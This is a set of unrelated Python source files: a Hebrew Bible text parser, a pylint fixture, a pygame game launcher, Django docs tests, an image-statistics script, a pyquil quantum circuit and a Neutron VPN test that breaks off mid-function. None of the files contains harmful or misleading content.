The text is based on the [Aleppo Codex][1].
[1]: https://en.wikipedia.org/wiki/Aleppo_Codex
Each book is in a separate HTML file (e.g., `c01.htm`) and contains navigation
and textual data.
The relevant structure is:
```html
<BODY>
<H1>...</H1>
<P>
<B>...,...</B> ...
</P>
</BODY>
```
Notes:
- verses are newline-delimited
- `<H1>` Hebrew book name
- `<B>` comma-separated Hebrew numbering of chapter and verse
- for multipart volumes (e.g., Samuel, Kings) also contains the part number
- `<BIG>`, `<SMALL>`, `<SUP>` around specific letter (we keep)
- `<A...>...</A>` links to notes (we ignore)
- `<BR>` within the text indicates a line break (we replace with a space)
- `{...}<BR>` indicates `pe` break (we ignore)
- `{...}` indicates `samekh` break (we ignore)
- `(...)` indicates the qere (we keep)
- the unvowelized previous word is the ketiv (we ignore)
"""
# native
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
# lib
from tqdm import tqdm
# pkg
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
#
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
#
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
"""Count words in a book."""
# pylint: disable=too-many-locals
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
# book_num = int(book.stem[1:], 10)
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
# result["books"].append(
# dict(id=book_num, name=book_name, corpus="mechon-mamre.org")
# )
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line) # reference removed
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
"""Enqueue paths of books to parse."""
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
"""Parse texts from <http://mechon-mamre.org>.
Usage: mechon_mamre_org.py [download <folder> | -i <PATH>] [-n COUNT]
Options:
download <folder> download HTML files to <folder>
--index, -i PATH HTML folder [default: text/mechon-mamre.org]
--cpus, -n NUM number of CPUs to use; at least 2 [default: all]
"""
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__": # pragma: no cover
main()
|
##Patterns: R0914: { "max-locals": "3" }
##Warn: R0914
def doEverything(thing):
a = 3
b = 3
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
|
# 作为新框架测试用
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
# 如果是Windows系统,在游戏中禁用显示缩放
# 注:通常高分屏用户在使用Windows系统时,都会把缩放调到100%以上,否则会瞎眼。
# 例如1920*1080屏幕,Windows推荐的缩放率就是125%。
# 这样会导致游戏窗口被严重放大,造成一部分游戏画面处在任务栏下方。
# 然而,在Linux系统下并没有这问题,所以这里只判定是否为Windows。
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
# 设置游戏窗口大小
screen = pygame.display.set_mode([WIDTH, HEIGHT])
# 设置窗口标题
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
# 设置PlayerCon为全局变量(必须要在CurrentMap.set_map之前完成)
global_var.set_value("PlayerCon", PlayerCon)
# 初始化地图
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
# 初始化BlockData(建立通过id反查地图编号的字典)
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
# 状态栏占位(如果删除,会影响游戏内地图的位置)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
# 初始化UI图层
# --- UI0 - 状态栏
STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
STATUSBAR.priority = 145
RootScreen.add_child(STATUSBAR)
global_var.set_value("STATUSBAR", STATUSBAR)
WriteLog.debug(__name__, "初始化状态栏图层完成")
# --- UI1 - 怪物手册
BOOK = ui.Book(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
BOOK.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(BOOK)
global_var.set_value("BOOK", BOOK)
WriteLog.debug(__name__, "初始化怪物手册图层完成")
# --- UI2 - 开始界面
STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
STARTMENU.priority = 500 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(STARTMENU)
global_var.set_value("STARTMENU", STARTMENU)
WriteLog.debug(__name__, "初始化开始界面图层完成")
# --- UI3 - 背包界面
BACKPACK = ui.Backpack(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
BACKPACK.priority = 150 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(BACKPACK)
global_var.set_value("BACKPACK", BACKPACK)
WriteLog.debug(__name__, "初始化背包图层完成")
# --- UI4 - 存档界面
SAVE = ui.SaveMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
SAVE.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(SAVE)
global_var.set_value("SAVE", SAVE)
WriteLog.debug(__name__, "初始化存档图层完成")
# --- UI5 - 读档界面
LOAD = ui.LoadMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
LOAD.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(LOAD)
global_var.set_value("LOAD", LOAD)
WriteLog.debug(__name__, "初始化读档图层完成")
# --- UI6 - 楼层传送器界面
FLY = ui.Fly(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
FLY.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(FLY)
global_var.set_value("FLY", FLY)
WriteLog.debug(__name__, "初始化楼层传送器图层完成")
# --- UI7 - 帮助界面
HELP = ui.Help(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
HELP.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(HELP)
global_var.set_value("HELP", HELP)
WriteLog.debug(__name__, "初始化帮助图层完成")
# --- UI8 - 商店1界面
Shop1 = ui.Shop1(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
Shop1.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(Shop1)
global_var.set_value("Shop1", Shop1)
WriteLog.debug(__name__, "初始化商店1图层完成")
# --- UI9 - 商店2界面
Shop2 = ui.Shop2(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
Shop2.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(Shop2)
global_var.set_value("Shop2", Shop2)
WriteLog.debug(__name__, "初始化商店2图层完成")
# --- UI10 - 文本框界面
TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
TEXTBOX.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(TEXTBOX)
global_var.set_value("TEXTBOX", TEXTBOX)
WriteLog.debug(__name__, "初始化文本框图层完成")
# --- UI11 - 选择框界面
CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
CHOICEBOX.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(CHOICEBOX)
global_var.set_value("CHOICEBOX", CHOICEBOX)
WriteLog.debug(__name__, "初始化选择框图层完成")
# --- UI12 - 显伤层
SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
SHOWDAMAGE.priority = 65 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(SHOWDAMAGE)
global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
WriteLog.debug(__name__, "初始化显伤层完成")
# --- UI13 - 色调层
CURTAIN = ui.Curtain(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
CURTAIN.priority = 125 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(CURTAIN)
global_var.set_value("CURTAIN", CURTAIN)
WriteLog.debug(__name__, "初始化色调层完成")
WriteLog.info(__name__, "初始化全部UI图层完成")
def init_actions():
# QUIT:
def quit(e):
global running
running = False
return True
# 注册事件
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
# DEBUG(开关在sysconf.py,如果开启将会启动控制台)
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
# 主程序
while running:
# a = pygame.time.get_ticks()
# 展示开始菜单
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
# 默认开启显伤
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
# 默认开启状态栏
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
# 地图确保为active状态
CurrentMap.active = True
# 载入初始事件
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
# 背景
RootScreen.flush(screen) # 显示刷新到屏幕
action_control.action_render() # 检查动作消息
# b = pygame.time.get_ticks()
# print(b - a)
|
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
"""
Document for a release without a date ("dev") is supported.
"""
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
"""
Document with a release without an EOL date is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
"""
Document with a release with an EOL date in the future is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
"""
Document with a release with an EOL date in the past is insupported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
"""
Dates are looked up on the latest micro release in a given series.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
# The EOL date of the first release is set automatically.
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
# Since 1.8.1 is still supported, docs show up as supported.
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
# This URL is linked from the docs.
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
# We need to create an extra Site because docs have SITE_ID=2
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
# non-existent file
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
# existing file
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
"""
Documents aren't created for partially translated documents excluded
from robots indexing.
"""
# Read the first Disallow line of robots.txt.
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
|
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
img = img[::, np.newaxis]
img_list.append(img)
# dir_path = './STL10-data/test'
# class_paths = os.listdir(dir_path)
# print(class_paths)
# for cls in class_paths:
# img_paths = os.listdir(dir_path + os.sep + cls)
# print(len(img_paths))
# for img_path in img_paths:
# print(img_path)
# img_path = dir_path + os.sep + cls + os.sep + img_path
# img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# img = img[::, np.newaxis]
# img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
mean.reverse()
std.reverse()
print(mean)
print(std)
|
# qubit number=4
# total number=31
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += Y(1) # number=19
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += Y(3) # number=20
prog += Y(1) # number=12
prog += RX(-2.158274153016188,3) # number=24
prog += H(0) # number=16
prog += CZ(2,0) # number=17
prog += H(0) # number=18
prog += CNOT(1,0) # number=21
prog += Z(1) # number=22
prog += H(0) # number=28
prog += CZ(1,0) # number=29
prog += H(0) # number=30
prog += H(0) # number=25
prog += CZ(2,0) # number=26
prog += H(0) # number=27
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
|
from .file import read_files, write_files
|
# Copyright 2013, Nachi Ueno, NTT I3, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
"""Test case to create a ipsec_site_connection."""
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
